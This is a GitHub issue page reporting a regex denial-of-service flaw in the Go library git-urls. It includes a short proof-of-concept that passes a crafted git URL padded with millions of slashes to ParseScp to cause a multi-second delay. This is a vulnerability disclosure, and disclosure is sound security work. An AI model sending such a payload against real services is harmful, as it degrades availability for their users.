git-urls icon indicating copy to clipboard operation
git-urls copied to clipboard

Published 20 hours ago verified publisher icon whilp

Security issue in regex

Open 6en6ar opened this issue 2 years ago • 1 comments

The regex on line 35. inside urls.go is vulnerable to regex denial of service when a long input is provided inside directory path of the git url. I managed to cause a 7s delay but only because the payload in the url was to long. Here is the PoC:

var payload = strings.Repeat("////", 19000000) //payload used, the number can be tweaked to cause 7 second delay
malicious_url := "6en6ar@-:0////" + payload + "\"
begin := time.Now()
//u, err := giturls.ParseScp("[email protected]:/remote/directory")// normal git url
_, err := giturls.ParseScp(malicious_url)
if err != nil {
fmt.Errorf("[ - ] Error ->" + err.Error())
}
//fmt.Println("[ + ] Url --> " + u.Host)
elapse := time.Since(begin)
fmt.Printf("Function took %s", elapse)

6en6ar avatar Oct 26 '23 21:10 6en6ar

Care to provide a fix?

mitar avatar Nov 21 '23 08:11 mitar